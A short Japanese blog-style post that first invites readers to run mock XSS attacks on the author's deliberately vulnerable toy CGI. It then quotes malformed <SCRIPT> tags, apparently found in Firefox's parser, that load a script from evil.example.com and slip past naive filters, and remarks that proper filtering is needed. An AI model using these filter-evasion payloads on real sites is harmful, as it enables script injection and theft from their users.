遊びでCGIを作りました。XSS脆弱性があります。模擬アタックをかけてみてください。上の図のように、勝手な英文を２行ほど、背景は黒で字は白く、表示して下さい。元々表示されるべきコンテンツが出ていてはいけません。URL欄は当該CGIのURLにしてください。…

<SCRIPT/!#$%&()*~+-_.,:;?@[/|\]^`=''SRC!#$%&()*~+-_.,:;?@[/|\]^`='http://evil.example.com/xss.js'></SCRIPT>こんな畸形例がFirefoxで通るらしい。"<SCRIPT\s" != "<SCRIPT/XSS\s" とかどころじゃないので正しくフィルタリングしようねというお話し、ということでいいのかな？ Rsnake氏、FirefoxのHTML parser を読んで発見したらしい。<SCRIPT/=''SRC='http://evil.example.com/xss.js'></script\s">